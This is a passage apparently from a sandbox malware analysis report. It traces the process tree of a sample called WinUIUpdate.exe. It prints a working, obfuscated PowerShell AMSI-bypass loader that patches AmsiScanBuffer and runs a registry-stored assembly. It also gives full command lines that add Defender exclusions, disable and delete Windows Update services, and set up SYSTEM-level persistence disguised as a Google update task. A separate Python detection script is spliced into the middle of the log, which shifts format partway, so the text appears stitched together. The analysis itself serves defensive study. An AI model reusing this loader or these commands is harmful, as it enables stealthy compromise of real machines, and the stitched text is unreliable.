'+[Char](105)+'g'+','+''+[Char](78)+''+[Char](101)+'wS'+[Char](108)+''+'o'+''+[Char](116)+','+'V'+'i'+[Char](114)+'t'+[Char](117)+'a'+'l'+'',$oPLoUAlLzn,$rTqGxIQPGJiKza).SetImplementationFlags('R'+'u'+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+','+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $KLkqgjJOoHS.CreateType();}$ODamPajeTXNoZ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+'t'+'e'+''+'m'+''+[Char](46)+'d'+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+'r'+''+[Char](111)+'s'+'o'+''+[Char](102)+'t.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+'2'+'.'+[Char](85)+'ns'+[Char](97)+''+[Char](102)+'e'+[Char](79)+''+[Char](68)+''+[Char](97)+'m'+[Char](80)+''+'a'+'j'+[Char](101)+'TX'+'N'+''+'o'+''+'Z'+'');$eYzAXlwrZvCzLh=$ODamPajeTXNoZ.GetMethod(''+[Char](101)+''+[Char](89)+'zAX'+[Char](108)+''+[Char](119)+''+'r'+''+[Char](90)+''+[Char](118)+''+[Char](67)+''+'z'+''+[Char](76)+''+[Char](104)+'',[Reflection.BindingFlags]''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'ic,'+[Char](83)+'ta'+[Char](116)+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$mhzluDsQCHqiknrQiXi=IZvLNQxByUyB @([String])([IntPtr]);$udDXqZGQPGcUpfxUGpWcTl=IZvLNQxByUyB 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KqkHQKtoaef=$ODamPajeTXNoZ.GetMethod(''+[Char](71)+''+[Char](101)+'tM'+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'ern'+[Char](101)+''+[Char](108)+'3'+[Char](50)+'.'+'d'+'ll')));$ZsxAtKDLMLJCmX=$eYzAXlwrZvCzLh.Invoke($Null,@([Object]$KqkHQKtoaef,[Object]('L'+[Char](111)+''+'a'+''+[Char](100)+'L'+[Char](105)+''+'b'+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+'A'+'')));$JmXFapyPAftBXmvZG=$eYzAXlwrZvCzLh.Invoke($Null,@([Object]$KqkHQKtoaef,[Object](''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'lP'+'r'+'o'+'t'+''+[Char](101)+''+'c'+'t')));$VpvLgyC=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZsxAtKDLMLJCmX,$mhzluDsQCHqiknrQiXi).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+'i'+[Char](46)+''+'d'+'l'+[Char](108)+'');$DJPwMyEbeadCTvbgs=$eYzAXlwrZvCzLh.Invoke($Null,@([Object]$VpvLgyC,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+'B'+'u'+[Char](102)+''+[Char](102)+''+'e'+'r')));$KnRgBJfvOH=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JmXFapyPAftBXmvZG,$udDXqZGQPGcUpfxUGpWcTl).Invoke($DJPwMyEbeadCTvbgs,[uint32]8,4,[ref]$KnRgBJfvOH);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$DJPwMyEbeadCTvbgs,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JmXFapyPAftBXmvZG,$udDXqZGQPGcUpfxUGpWcTl).Invoke($DJPwMyEbeadCTvbgs,[uint32]8,0x20,[ref]$KnRgBJfvOH);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOF'+[Char](84)+''+'W'+''+[Char](65)+'R'+'E'+'').GetValue(''+[Char](100)+''+[Char](105)+''+'a'+''+[Char](108)+''+[Char](101)+'rst'+'a'+''+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)2⤵
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Drops file in System32 directory
      - Suspicious use of SetThreadContext
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      PID 1800
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k netsvcs -s gpsvc  |  PID 728
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog  |  PID 1100
    - Drops file in System32 directory
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k dcomlaunch -s LSM  |  PID 920
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc  |  PID 1152
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k localservice -s EventSystem  |  PID 1168
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay  |  PID 764
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k netsvcs -s Themes  |  PID 1184
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k localservice -s nsi  |  PID 1312
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k netsvcs -s UserManager  |  PID 1412
  [2] c:\windows\system32\sihost.exe  |  cmd: sihost.exe  |  PID 2824
      - Modifies registry class
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k netsvcs -s SENS  |  PID 1428
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp  |  PID 1444
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder  |  PID 1488
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k networkservice -s NlaSvc  |  PID 1568
[1] C:\Windows\System32\svchost.exe  |  cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted  |  PID 1624
    - Modifies Internet Explorer settings
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k networkservice -s Dnscache  |  PID 1608
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k localservice -s netprofm  |  PID 1828
[1] C:\Windows\system32\svchost.exe  |  cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted  |  PID 1752
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k appmodel -s StateRepository  |  PID 1864
[1] C:\Windows\System32\svchost.exe  |  cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted  |  PID 1744
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection  |  PID 1880
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation  |  PID 2016
[1] C:\Windows\System32\spoolsv.exe  |  cmd: C:\Windows\System32\spoolsv.exe  |  PID 1968
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT  |  PID 2236
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent  |  PID 2244
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc  |  PID 2324
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer  |  PID 2264
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k netsvcs -s Browser  |  PID 2416
[1] c:\windows\system32\svchost.exe  |  cmd: c:\windows\system32\svchost.exe -k netsvcs -s WpnService  |  PID 2480
[1] C:\Windows\Explorer.EXE  |  cmd: C:\Windows\Explorer.EXE  |  PID 3148
    - Drops file in Windows directory
    - Modifies Internet Explorer settings
    - Modifies registry class
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
  [2] C:\Users\Admin\AppData\Local\Temp\WinUIUpdate.exe  |  cmd: "C:\Users\Admin\AppData\Local\Temp\WinUIUpdate.exe"  |  PID 4192
      - Suspicious use of NtCreateUserProcessOtherParentProcess
      - Drops file in Drivers directory
      - Suspicious use of SetThreadContext
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  |  cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force  |  PID 4616
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\cmd.exe  |  cmd: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f  |  PID 4444
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\sc.exe  |  cmd: sc stop UsoSvc  |  PID 4628
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe  |  cmd: sc stop WaaSMedicSvc  |  PID 3652
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe  |  cmd: sc stop wuauserv  |  PID 4656
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe  |  cmd: sc stop bits  |  PID 2948
        - Launches sc.exe
    [3] C:\Windows\System32\sc.exe  |  cmd: sc stop dosvc  |  PID 3756
        - Launches sc.exe
    [3] C:\Windows\System32\reg.exe  |  cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f  |  PID 3200
    [3] C:\Windows\System32\reg.exe  |  cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f  |  PID 5000
    [3] C:\Windows\System32\reg.exe  |  cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f  |  PID 4352
        - Modifies security service
    [3] C:\Windows\System32\reg.exe  |  cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f  |  PID 4200
    [3] C:\Windows\System32\reg.exe  |  cmd: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f  |  PID 5044
  [2] C:\Windows\System32\cmd.exe  |  cmd: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0  |  PID 1388
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\powercfg.exe  |  cmd: powercfg /x -hibernate-timeout-ac 0  |  PID 4276
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\powercfg.exe  |  cmd: powercfg /x -hibernate-timeout-dc 0  |  PID 4584
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\powercfg.exe  |  cmd: powercfg /x -standby-timeout-ac 0  |  PID 4916
        - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\System32\powercfg.exe  |  cmd: powercfg /x -standby-timeout-dc 0  |  PID 1308
        - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  |  cmd: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#srdzkpcvs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineUA' /tr '''C:\Program Files\Google\Chrome\chromeupdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\chromeupdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineUA' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineUA" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\chromeupdater.exe' }  |  PID 4068
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
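Added example, not part of the report: the four command lines WinUIUpdate.exe launches above (the Defender exclusion, the service stop and service-key deletion chain, the powercfg timeouts, and the persistence script that picks schtasks, Register-ScheduledTask or an HKCU Run value depending on admin rights and OS version) can each be caught on the command line alone. The Python below runs a small rule set over constructed copies of those lines plus one benign service host for contrast. The rule names, the update-service list and the abbreviated persistence sample (the IsInRole and version checks are shortened to IF(...)) are this example's assumptions.

```python
import re

# Constructed samples copied from the process tree above; the last line is benign.
SAMPLES = [
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force",
    r'C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f',
    r"C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0",
    # Abbreviated: the two IF(...) conditions stand in for the IsInRole and OSVersion checks.
    r"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#srdzkpcvs#> IF(...) { IF(...) { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineUA' /tr '''C:\Program Files\Google\Chrome\chromeupdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\chromeupdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -TaskName 'GoogleUpdateTaskMachineUA' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineUA" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\chromeupdater.exe' }""",
    r"c:\windows\system32\svchost.exe -k netsvcs -s Schedule",
]

SERVICE_STOP = re.compile(r"\bsc(?:\.exe)?\s+stop\s+(\w+)", re.I)
SERVICE_KEY_DELETE = re.compile(r'\breg(?:\.exe)?\s+delete\s+"HKLM\\SYSTEM\\CurrentControlSet\\Services\\(\w+)"\s+/f', re.I)

# Rule name -> pattern. findall() output is returned so the analyst sees what matched.
RULES = {
    "defender_exclusion": re.compile(r"Add-MpPreference\s+-ExclusionPath", re.I),
    "service_stop": SERVICE_STOP,
    "service_key_delete": SERVICE_KEY_DELETE,
    "power_timeout_zeroed": re.compile(r"powercfg(?:\.exe)?\s+/x\s+-(hibernate|standby)-timeout-(ac|dc)\s+0\b", re.I),
    "schtasks_as_system": re.compile(r"schtasks\s+/create\b.*?/ru\s+'?System'?", re.I | re.S),
    "scheduledtask_as_system": re.compile(r"Register-ScheduledTask\b.*?-User\s+'System'", re.I | re.S),
    "run_key_persistence": re.compile(r'\breg(?:\.exe)?\s+add\s+"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"', re.I),
}

# Assumed set: the Windows Update and delivery services the sample disables.
UPDATE_SERVICES = {"usosvc", "waasmedicsvc", "wuauserv", "bits", "dosvc"}

# Executable registered via schtasks /tr '''...''', New-ScheduledTaskAction -Execute '...'
# or a Run-key value set with reg add ... /d '...'.
TARGET_PATH = re.compile(r"(?:/tr\s+'''|-Execute\s+'|/d\s+')([^']+)'", re.I)


def triage(cmdline):
    """Rule name -> findall() result for every rule that fires on this command line."""
    return {name: rx.findall(cmdline) for name, rx in RULES.items() if rx.search(cmdline)}


def windows_update_tamper(cmdline):
    """Update services this command line stops or whose service keys it deletes, case-insensitively sorted."""
    names = set(SERVICE_STOP.findall(cmdline)) | set(SERVICE_KEY_DELETE.findall(cmdline))
    return sorted((n for n in names if n.lower() in UPDATE_SERVICES), key=str.lower)


def persistence_targets(cmdline):
    """Paths this command line arranges to run at logon, startup or boot."""
    return set(TARGET_PATH.findall(cmdline))


if __name__ == "__main__":
    for line in SAMPLES:
        print(sorted(triage(line)), windows_update_tamper(line), persistence_targets(line))
```

The persistence sample is worth matching on all three branches: a task registered with /ru System and /rl highest (or -User 'System' -RunLevel 'Highest') runs the dropped binary as SYSTEM at every boot, and the Run-key branch guarantees the same path still starts when the sample lands without admin rights. Deleting the service keys rather than just stopping the services is what makes the "Modifies security service" signature fire on the wuauserv reg.exe above.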
  [2] C:\Windows\System32\dialer.exe  |  cmd: C:\Windows\System32\dialer.exe  |  PID 5032
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵PID:4608
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"3⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2600
-
C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 4)
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.0.1328874663\652812049" -parentBuildID 20221007134813 -prefsHandle 1640 -prefMapHandle 1628 -prefsLen 20888 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {95f3f2cd-0156-46eb-be80-2dac44842e46} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 1732 25a1fc1a558 gpu
PID:4744
-
C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 4)
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.1.642940632\1519065521" -parentBuildID 20221007134813 -prefsHandle 2076 -prefMapHandle 2072 -prefsLen 20969 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dee773ce-4d48-4a32-b3c9-4f37dfe9b0b9} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 2088 25a1e7fa558 socket
- Checks processor information in registry
PID:164
-
C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 4)
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.2.1440049793\688447532" -childID 1 -isForBrowser -prefsHandle 2696 -prefMapHandle 2712 -prefsLen 21052 -prefMapSize 232675 -jsInitHandle 1168 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {16aa0724-52f1-4eeb-89e9-56b0b7f1899f} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 2892 25a226ed258 tab
PID:4568
-
C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 4)
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.4.1988170570\1960732705" -childID 3 -isForBrowser -prefsHandle 3656 -prefMapHandle 3448 -prefsLen 26562 -prefMapSize 232675 -jsInitHandle 1168 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e5043c43-ebd3-4ede-846d-f96685dbf03c} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 3664 25a2380a158 tab
PID:1796
-
C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 4)
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.3.1086498294\846068342" -childID 2 -isForBrowser -prefsHandle 3456 -prefMapHandle 3452 -prefsLen 26562 -prefMapSize 232675 -jsInitHandle 1168 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5498bf3b-7ec2-49e3-9aaa-7ea64de0fc41} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 3464 25a229deb58 tab
PID:4864
-
C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 4)
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.5.1156688670\1610931462" -childID 4 -isForBrowser -prefsHandle 4768 -prefMapHandle 4744 -prefsLen 26702 -prefMapSize 232675 -jsInitHandle 1168 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d1233b40-70e4-4cb4-8784-82510402ccdb} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 4788 25a24838658 tab
PID:3940
-
C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 4)
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.7.1629581759\1693239971" -childID 6 -isForBrowser -prefsHandle 5084 -prefMapHandle 5088 -prefsLen 26702 -prefMapSize 232675 -jsInitHandle 1168 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fb561192-fca7-4587-a109-1756deb4196b} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 4984 25a24ebb558 tab
PID:2560
-
C:\Program Files\Mozilla Firefox\firefox.exe (tree depth 4)
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2600.6.598857025\236853237" -childID 5 -isForBrowser -prefsHandle 4892 -prefMapHandle 4896 -prefsLen 26702 -prefMapSize 232675 -jsInitHandle 1168 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {eef8acad-4d3d-46cb-a2ec-22f587303a41} 2600 "\\.\pipe\gecko-crash-server-pipe.2600" 4808 25a24eb8258 tab
PID:4000
-
C:\Windows\System32\RuntimeBroker.exe (tree depth 1)
C:\Windows\System32\RuntimeBroker.exe -Embedding
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:3660
-
C:\Windows\system32\wbem\unsecapp.exe (tree depth 1)
C:\Windows\system32\wbem\unsecapp.exe -Embedding
PID:2028
-
c:\windows\system32\svchost.exe (tree depth 1)
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
PID:2840
-
C:\Windows\sysmon.exe (tree depth 1)
C:\Windows\sysmon.exe
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2488
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe (tree depth 1)
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2468
-
c:\windows\system32\svchost.exe (tree depth 1)
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
PID:2460
-
C:\Windows\system32\DllHost.exe (tree depth 1)
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
PID:4604
-
C:\Windows\system32\WerFault.exe (tree depth 2)
C:\Windows\system32\WerFault.exe -u -p 4604 -s 788
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:1208
-
C:\Windows\system32\DllHost.exe (tree depth 1)
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
PID:4040
-
C:\Windows\system32\WerFault.exe (tree depth 2)
C:\Windows\system32\WerFault.exe -u -p 4040 -s 856
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:1136
-
C:\Windows\system32\WerFault.exe (tree depth 2)
C:\Windows\system32\WerFault.exe -u -p 4040 -s 836
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:4756
-
c:\windows\system32\svchost.exe (tree depth 1)
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
PID:2448
-
c:\windows\system32\svchost.exe (tree depth 1)
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2424
-
c:\windows\system32\svchost.exe (tree depth 1)
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
PID:4668
-
C:\Windows\system32\svchost.exe (tree depth 1)
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
PID:3336
-
C:\Windows\System32\svchost.exe (tree depth 1)
C:\Windows\System32\svchost.exe -k WerSvcGroup
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5032
-
C:\Windows\system32\DllHost.exe (tree depth 1)
C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}
PID:3912
-
C:\Windows\system32\WerFault.exe (tree depth 2)
C:\Windows\system32\WerFault.exe -u -p 3912 -s 412
- Program crash
PID:4716
-
C:\Windows\system32\WerFault.exe (tree depth 2)
C:\Windows\system32\WerFault.exe -u -p 3912 -s 460
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:1456
-
C:\Windows\system32\DllHost.exe (tree depth 1)
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
PID:4652
-
C:\Windows\system32\WerFault.exe (tree depth 2)
C:\Windows\system32\WerFault.exe -u -p 4652 -s 404
- Program crash
PID:4876
-
C:\Windows\system32\DllHost.exe (tree depth 1)
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
PID:616
-
C:\Windows\system32\svchost.exe (tree depth 1)
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc
PID:4624
-
C:\Windows\System32\SystemSettingsBroker.exe (tree depth 1)
C:\Windows\System32\SystemSettingsBroker.exe -Embedding
PID:4444
-
\??\c:\windows\system32\svchost.exe (tree depth 1)
c:\windows\system32\svchost.exe -k localservice -s SstpSvc
PID:3516
-
\??\c:\windows\system32\svchost.exe (tree depth 1)
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s RmSvc
PID:3916
-
C:\Windows\system32\svchost.exe (tree depth 1)
C:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:3640
-
\??\c:\windows\system32\svchost.exe (tree depth 1)
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
- Drops file in Windows directory
PID:5048
-
\??\c:\windows\system32\svchost.exe (tree depth 1)
c:\windows\system32\svchost.exe -k netsvcs -s RasMan
PID:4100
-
C:\Windows\system32\DllHost.exe (tree depth 1)
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
PID:2120
-
C:\Windows\system32\WerFault.exe (tree depth 2)
C:\Windows\system32\WerFault.exe -u -p 2120 -s 336
- Program crash
PID:3108
-
C:\Windows\system32\DllHost.exe (tree depth 1)
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
PID:1824
-
C:\Windows\system32\WerFault.exe (tree depth 2)
C:\Windows\system32\WerFault.exe -u -p 1824 -s 360
- Program crash
PID:4520
-
C:\Windows\system32\WerFault.exe (tree depth 2)
C:\Windows\system32\WerFault.exe -u -p 1824 -s 644
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:320
-
C:\Windows\system32\DllHost.exe (tree depth 1)
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
- Drops file in Windows directory
PID:4872
-
C:\Windows\system32\WerFault.exe (tree depth 2)
C:\Windows\system32\WerFault.exe -u -p 4872 -s 696
- Program crash
PID:4012
-
C:\Windows\system32\ApplicationFrameHost.exe (tree depth 1)
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:3032
-
C:\Windows\ImmersiveControlPanel\SystemSettings.exe (tree depth 1)
"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:2096
